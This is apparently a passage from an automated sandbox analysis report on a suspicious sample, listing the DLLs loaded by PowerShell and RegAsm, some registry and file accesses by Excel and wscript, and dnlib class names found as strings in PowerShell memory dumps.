                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64win.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wow64cpu.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msacm32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: shcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000E.00000002.473517059.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473399421.0000000000339000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17K source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000E.00000002.473517059.00000000009F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.473399421.0000000000339000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.pdb source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000E.00000002.476129104.0000000006300000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000E.00000002.474061036.00000000042A9000.00000004.00000800.00020000.00000000.sdmp
